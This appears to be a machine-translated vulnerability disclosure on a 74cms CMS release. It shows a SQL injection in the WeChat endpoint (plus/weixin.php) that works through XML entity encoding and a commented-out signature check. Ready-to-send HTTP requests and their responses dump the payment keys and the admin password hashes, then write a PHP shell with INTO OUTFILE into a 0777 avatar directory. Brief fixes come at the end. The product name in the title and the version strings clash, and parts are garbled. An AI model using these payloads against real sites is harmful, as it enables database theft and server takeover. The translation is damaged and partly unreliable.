Multiple vulnerability combinations in server guard CMS (20141027) can cause all data leakage + getshell and Solutions

Multiple vulnerability combinations in server guard CMS (20141027) can cause all data leakage + getshell and Solutions
74cms_v3.5.20.20151127.zip unlimited SQL injection just got 74cms_v3.5.20.20151127.zip, and diff found the following changes:

diff -Nurp upload.1020/plus/weixin.php upload.1027/plus/weixin.php--- upload.1020/plus/weixin.php 2014-10-18 12:14:22.000000000 +0800+++ upload.1027/plus/weixin.php 2014-10-25 14:45:22.000000000 +0800@@ -21,10 +21,10 @@ class wechatCallbackapiTest extends mysq     }     public function responseMsg()     {- if(!$this->checkSignature())- {-         exit();-        }+ // if(!$this->checkSignature())+ // {+  //        exit();+  //       }  $postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);  if (!empty($postStr))  {

 

The annotation calls checkSignature (). Why ????? Two other bugs were exploited. Check the code first.

class wechatCallbackapiTest extends mysql{public function valid()    {        $echoStr = $_GET["echostr"];        if($this->checkSignature()){         exit($echoStr);        }    }    public function responseMsg()    {// if(!$this->checkSignature())// {  //        exit();  //       }$postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);if (!empty($postStr)){// libxml_disable_entity_loader(true);            $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);            $fromUsername = $postObj->FromUserName;            $toUsername = $postObj->ToUserName;            $keyword = trim($postObj->Content);$keyword = utf8_to_gbk($keyword);$keyword = addslashes($keyword);            $time = time();$event = trim($postObj->Event);if ($event === "subscribe"){$word= "»ØžŽj·µ»ØœôŒ±ÕÐÆž£¬»ØžŽn·µ»Ø×îÐÂÕÐÆž£¡Äú¿ÉÒÔ³¢ÊÔÊäÈëְλÃû³ÆÈç¡°»áŒÆ¡±£¬ÏµÍ³œ«»á·µ»ØÄúÒªÕÒµÄÐÅÏ¢£¬ÎÒÃÇŬÁŠŽòÔì×îÈËÐÔ»¯µÄ·þÎñƜ̚£¬Ð»Ð»¹Ø×¢¡£";$this->exit_word_message($word,$fromUsername,$toUsername,$time); } $default_pic=ROOT."/data/images/".DEFAULT_PIC;$first_pic=ROOT."/data/images/".FIRST_PIC;if($event === "CLICK"){if($_CFG['weixin_apiopen']=='0'){$word="Íø՟΢ÐŜӿÚÒÑŸ­¹Ø±Õ";$this->exit_word_message($word,$fromUsername,$toUsername,$time);}if($postObj->EventKey=="binding"){$usinfo = $this->get_user_info($fromUsername);if(!empty($usinfo)){$word="ÄúÒÑŸ­°ó¶š¹ýÁË!";}else{$word="ÇëÊäÈëÄúµÄÕ˺ÅÃÜÂë.ÀýÈç:ÕÅÈý/123456";}$this->exit_word_message($word,$fromUsername,$toUsername,$time);}...private function get_user_info($fromUsername){$usinfo = array();$usinfo_obj = $this->query("select * from ".table('members')." where weixin_openid='".$fromUsername."' limit 1");while($row = $this->fetch_array($usinfo_obj)){$usinfo = $row;}return $usinfo;}

 

$postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);

 

Addslashes is performed for the entire POST_DATA.

$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);            $fromUsername = $postObj->FromUserName;

 

Then:

$usinfo = $this->get_user_info($fromUsername);===>$this->query("select * from ".table('members')." where weixin_openid='".$fromUsername."' limit 1");

 

$ FromUsername directly enters SQL after simplexml_load_string (). Does addslashes ($ GLOBALS ["HTTP_RAW_POST_DATA"]) solve all the problems? The answer is no. Because special characters in XML can also be encoded: special characters special meanings entity Encoding

> Start mark & gt; <End mark & lt; "quotation marks & quot; 'marker & apos; & amp;

 

That is to say, in XML, the 'number is injected using & apos, and there is no filtering for post data, and any SQL statement can be injected, so we can export the entire database, or even getshell. some people may say that the following code is conditional, because $ _ CFG ['weixin _ apiopen'] = '0' is determined here ').

if($event === "CLICK"){if($_CFG['weixin_apiopen']=='0'){$word="Íø՟΢ÐŜӿÚÒÑŸ­¹Ø±Õ";$this->exit_word_message($word,$fromUsername,$toUsername,$time);}

 

However, is $ _ CFG ['weixin _ apiopen'] effective? The following code tells us:

<?php$_CFG = 0;class Test {    function myprint() {        echo "$_CFG in class=" . $_CFG;    }}echo "in file =" . $_CFG;$tt = new Test();$tt->myprint();?>

 

Visit http: // 127.0.0.1: 8081/74 cms/test. php In the browser. The result is:

in file =0Notice: Undefined variable: _CFG in /var/www/html/74cms/test.php on line 7Notice: Undefined variable: _CFG in /var/www/html/74cms/test.php on line 7in class=

 

That is, accessing $ _ CFG in a class object is invalid. So,

$_CFG['weixin_apiopen']=='0'

 

This condition will never be true, no matter whether weixin_api is enabled in the background. Okay. All the conditions are excluded and can be injected directly. For 74cms_v3.5.20.20151127, the default installation test is as follows:

POST/74cms/plus/weixin. php? Signature = da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1Content-Type: application/xml User-Agent: http4e/5.0.12Host: 127.0.0.1: 8081Content-Length: 155 <xml> <ToUserName> 111 </ToUserName> <FromUserName> 1111 & apos; </FromUserName> <Content> 2222 </Content> <Event> CLICK </Event> <EventKey> binding </EventKey> </xml> HTTP/1.1 200 OKDate: Wed, 29 Oct 2014 07:33:13 GMTServer: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsg I/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4X-Powered-By: PHP/5.5.18Set-Cookie: PHPSESSID = 2ctd2pnvhip2mpvbs57rlvmq91; path =/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check = 0, pre-check = 0 Pragma: no-cacheContent-Length: 79Content-Type: text/html; charset = gb2312Error �� Query error: select * from qs_members where weixin_openid = '000000' 'limit 1 UNIO N select: POST/74cms/plus/weixin. php? Signature = da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1Content-Type: application/xml User-Agent: http4e/5.0.12Host: 127.0.0.1: 8081Content-Length: 226 <xml> <ToUserName> 111 </ToUserName> <FromUserName> 1111 & apos; union select, 19,20, 2222 # </FromUserName> <Content> 1.1 </Content> <Event> CLICK </Event> <EventKey> binding </EventKey> </xml> HTTP/200 OKDate: wed, 29 Oct 2014 07:36:59 GMTServer: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4X-Powered-By: PHP/5.5.18Set-Cookie: PHPSESSID = 3nhpuf9it16ea6omld6h000012; path =/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check = 0, pre-check = 0 Pragma: no-cacheContent-Length: Plain content-type: text/html; charset = gb2312 <xml> <ToUse RName> <! [CDATA [1111 'Union select, 21,22 #]> </ToUserName> <FromUserName> <! [CDATA [111]> </FromUserName> <CreateTime> 1414568219 </CreateTime> <MsgType> <! [CDATA [text]> </MsgType> <Content> <! [CDATA [you have already bound it!]> </Content> </xml>

 

Get the payment-related key:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1Content-Type: application/xml User-Agent: http4e/5.0.12Host: 127.0.0.1:8081Content-Length: 303

 

<xml><ToUserName>111</ToUserName><FromUserName>1111&apos; union select (select group_concat(id,0x7c,typename,0x7c,ytauthkey,0x5d) from qs_payment),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName><Content>2222</Content><Event>CLICK</Event><EventKey>apply_jobs</EventKey></xml>

 

HTTP/1.1 200 OKDate: Wed, 29 Oct 2014 07:49:52 GMTServer: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4X-Powered-By: PHP/5.5.18Set-Cookie: PHPSESSID=u4o47rf3pk29shkk433cfompj0; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 137Content-Type: text/html;charset=gb2312Error��Query error:select * from qs_personal_jobs_apply where personal_uid=1|remittance|],2|chinabank|],3|tenpay|xndcgc],4|alipay|kiohad]

 

1 | remittance |], 2 | chinabank |], 3 | tenpay | xndcgc], 4 | alipay | kiohad] in the error message is the data in the table. Administrator table:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1Content-Type: application/xml User-Agent: http4e/5.0.12Host: 127.0.0.1:8081Content-Length: 303

 

 

<xml><ToUserName>111</ToUserName><FromUserName>1111&apos; union select (select group_concat(admin_name,0x7c,pwd,0x7c,pwd_hash,0x5d) from qs_admin),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName><Content>2222</Content><Event>CLICK</Event><EventKey>apply_jobs</EventKey></xml>

 

HTTP/1.1 200 OKDate: Wed, 29 Oct 2014 08:09:07 GMTServer: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4X-Powered-By: PHP/5.5.18Set-Cookie: PHPSESSID=dgh5nio4aflji6ppjatq9iee14; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 121Content-Type: text/html;charset=gb2312Error��Query error:select * from qs_personal_jobs_apply where personal_uid=admin|81cdc144e960168e163223605e5daeba|taZeD1]

 

Getshell:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1Content-Type: application/xml User-Agent: http4e/5.0.12Host: 127.0.0.1:8081Content-Length: 324

 

<xml><ToUserName>111</ToUserName><FromUserName>1111&apos; union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE &apos;/var/www/html/74cms/data/shell.php&apos; #</FromUserName><Content>2222</Content><Event>CLICK</Event><EventKey>binding</EventKey></xml>

 

Returned error:

HTTP/1.1 200 OKDate: Wed, 29 Oct 2014 08:29:11 GMTServer: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4X-Powered-By: PHP/5.5.18Set-Cookie: PHPSESSID=tkimiq88f2v707inhs5avrvbd5; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 238Content-Type: text/html;charset=gb2312Error��Query error:select * from qs_members where weixin_openid='1111' union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE '/var/www/html/74cms/data/shell.php' #' limit 1

This is because the write permission is required to write shell. php, and the data directory is unavailable. However, we can also find a directory with write permissions: register an ordinary user and upload an avatar, which will create a directory with 0777 permissions: 'Data/avatar/100', and the shell will upload it to this directory.

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1Content-Type: application/xml User-Agent: http4e/5.0.12Host: 127.0.0.1:8081Content-Length: 340

 

<xml><ToUserName>111</ToUserName><FromUserName>1111&apos; union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE &apos;/var/www/html/74cms/data/avatar/100/2014/shell.php&apos; #</FromUserName><Content>2222</Content><Event>CLICK</Event><EventKey>binding</EventKey></xml>

 

HTTP/1.1 200 OKDate: Wed, 29 Oct 2014 08:25:09 GMTServer: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4X-Powered-By: PHP/5.5.18Set-Cookie: PHPSESSID=8m121t281t85udkja8rt8ub147; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 448Content-Type: text/html;charset=gb2312

 

 

<Xml> <ToUserName> <! [CDATA [1111 'Union select 0x3C3F70687020706870696E666F28293B3F3E, 22 into outfile '/var/www/html/74cms/data/avatar/100/2014/shell. php '#]> </ToUserName> <FromUserName> <! [CDATA [111]> </FromUserName> <CreateTime> 1414571109 </CreateTime> <MsgType> <! [CDATA [text]> </MsgType> <Content> <! [CDATA [enter your account and password. For example, Michael Jacob/123456]> </Content> </xml>

 

Browser access: http: // 127.0.0.1: 8081/74 cms/data/avatar/100/2014/shell. php
Solution: 1. What is checkSignature () not required? 2. if ($ _ CFG ['weixin _ apiopen'] = '0') always are not true, and define ("apiopen ", $ _ CFG ['weixin _ apiopen. 3. Before each element of $ postObj is used, addslashes () 4. You do not need the 0777 permission to upload the image file directory.